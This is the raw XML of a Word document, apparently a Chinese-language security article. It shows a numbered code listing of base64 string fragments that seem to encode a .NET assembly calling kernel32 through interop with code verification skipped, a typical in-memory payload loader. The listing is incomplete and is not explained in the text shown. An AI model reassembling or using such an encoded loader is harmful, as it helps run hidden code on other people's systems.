2912,15347,2915,15347,2917,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15347,2920,15348,2920,15348,2920,15348,2920,15348,2920,15348,2920,15349,2920,15349,2920,15349,2920,15349,2920,15350,2920,15350,2920,15350,2920,15351,2920,15351,2920,15352,2920,15352,2920,15353,2920,15353,2920,15354,2920,15354,2920,15355,2920,15356,2920,15356,2920,15357,2920,15358,2920,15359,2920,15360,2920,15361,2920,15361,2920,15362,2920,15363,2920,15365,2920,15366,2920,15367,2920,15368,2920,15369,2920,15371,2920,15372,2920,15373,2920,15375,2920,15376,2920,15378,2920,15379,2920,15381,2920,15383,2920,15385,2920,15386,2920,15388,2920,15390,2920,15392,2920,15394,2920,15396,2920,15399,2920,15401,2920,15403,2920,15406,2920,15408,2920,15411,2920,15413,2920,15416,2920,15419,2920,15421,2920,15424,2920,15427,2920,15430,2920,15433,2920,15436,2920,15440,2920,15443,2920,15446,2920,15450,2920,15453,2920,15457,2920,15461,2920,15465,2920,15469,2920,15472,2920,15477,2920,15481,2920,15485,2920,15489,2920,15494,2920,15498,2920,15503,2920,15507,2920,15512,2920,15517,2920,15522,2920,15527,2920,15532,2920,15537,2920,15543,2920,15548,2920,15554,2920,15559,2920,15565,2920,15571,2920,15577,2920,15583,2920,15589,2920,15595,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2920,15602,2919,15602,2919,15602,2919,15602,2919,15602,2919,15602,2919,15602,2919,15602,2918,15602,2918,15602,2918,15602,2918,15602,2917,15602,2917,15602,2917,15602,2917,15602,2916,15602,2916,15602,2916,15602,2915,15602,2915,15602,2914,15602,2914,15602,2914,15602,2913,15602,2913,15602,2912,15602,2912,15602,2911,15602,2910,15602,2910,15602,2909,15602,2909,15602,2908,15602,2907,15602,2907,15602,2906,15602,2905,15602,2904,15602,2903,15602,2903,15602,2902,15602,2901,15602,2900,15602,2899,15602,2898,15602,2897,15602,2896,15602,2895,15602,2894,15602,2893,15602,2892,15602,2890,15602,2889,15602,2888,15602,2887,15602,2885,15602,2884,15602,2883,15602,2881,15602,2880,15602,2878,15602,2877,15602,2875,15602,2874,15602,2872,15602,2870,15602,2869,15602,2867,15602,2865,15602,2863,15602,2861,15602,2859,15602,2857,15602,2855,15602,2853,15602,2851,15602,2849,15602,2847,15602,2845,15602,2843,15602,2840,15602,2838,15602,2836,15602,2833,15602,2831,15602,2828,15602,2826,15602,2823,15602,2820,15602,2818,15602,2815,15602,2812,15602,2809,15602,2806,15602,2803,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15601,2800,15601,2800,15601,2800,15601,2800,15601,2800,15601,2800,15601,2800,15600,2800,15600,2800,15600,2800,15600,2800,15599,2800,15599,2800,15599,2800,15599,2800,15598,2800,15598,2800,15597,2800,15597,2800,15596,2800,15596,2800,15595,2800,15595,2800,15594,2800,15594,2800,15593,2800,15592,2800,15591,2800,15591,2800,15590,2800,15589,2800,15588,2800,15587,2800,15586,2800,15585,2800,15584,2800,15583,2800,15582,2800,15581,2800,15579,2800,15578,2800,15577,2800,15575,2800,15574,2800,15572,2800,15571,2800,15569,2800,15567,2800,15566,2800,15564,2800,15562,2800,15560,2800,15558,2800,15556,2800,15554,2800,15552,2800,15550,2800,15548,2800,15545,2800,15543,2800,15541,2800,15538,2800,15535,2800,15533,2800,15530,2800,15527,2800,15524,2800,15521,2800,15518,2800,15515,2800,15512,2800,15509,2800,15506,2800,15502,2800,15499,2800,15495,2800,15491,2800,15488,2800,15484,2800,15480,2800,15476,2800,15472,2800,15468,2800,15464,2800,15459,2800,15455,2800,15450,2800,15446,2800,15441,2800,15436,2800,15432,2800,15427,2800,15422,2800,15416,2800,15411,2800,15406,2800,15400,2800,15395,2800,15389,2800,15383,2800,15378,2800,15372,2800,15366,2800,15359,2800,15353,2800,15347e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>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86" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11920" w:h="16840"/>
          <w:pgMar w:header="0" w:footer="0" w:top="0" w:bottom="0" w:left="0" w:right="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1339" w:firstLine="-15"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>93</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"bml0aWFsaXplQXJyYXkASW50UHRyAG9wX0V4cGxpY2l0AFN5c3RlbS5SdW50aW1lLklud</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>GVyb3BT"</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94</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"ZXJ2aWNlcwBNYXJzaGFsAENvcHkAWmVybwBEbGxJbXBvcnRBdHRyaWJ1dGUAa2VybmVsM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>zIALmNj"</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95</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"dG9yAFN5c3RlbS5TZWN1cml0eQBVbnZlcmlmaWFibGVDb2RlQXR0cmlidXRlAAAAAAADI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AAAAAAA"</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96</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"Qb0yqILbcUSMHaCaQbsD3QAIt3pcVhk04IkDIAABAwAAAQIGCQcABAkJCQkJCgAGGAkJC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>RgJEAkF"</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97</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"AAIJGAkFIAEBEQ0EIAEBCAQBAAAAAwYREAcAAgESKREtBAABGAoIAAQBHQUIGAgCBhgIB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>wUdBQkY"</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98</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"CRgEIAEBDggBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwGAni4Bg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IRTeXN0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="148" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1339" w:firstLine="-15"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>99</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="53"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"ZW0uU2VjdXJpdHkuUGVybWlzc2lvbnMuU2VjdXJpdHlQZXJtaXNzaW9uQXR0cmlidXRlL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CBtc2Nv"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="163"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100</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"cmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>a2VuPWI3"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="148"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101</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"N2E1YzU2MTkzNGUwODkVAVQCEFNraXBWZXJpZmljYXRpb24BAAAAAAAAAAAAAAAAAAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AAAAAAAA"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="163"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102</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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AAAAAAAA"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="148"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103</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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AAAAAAAA"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="163"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104</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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AAAAAAAA"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="148"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105</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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AAAAAAAA"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="163"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106</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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AAAAAAAA"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="148"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107</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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AAAAAAAA"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="163"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108</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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AAAAAAAA"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="148"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109</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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AAAAAAAA"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="163"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110</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"AQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFhAAAA8AgAAAAAAAAAAAAA8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AjQAAABW"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="148"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111</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"AFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAAAAAAAAAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AAAAAAAA"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="163"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112</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"PwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AGYAbwAA"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="148"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113</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"AAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAAALAEnAEAAAEAUwB0AHIA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>aQBuAGcA"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
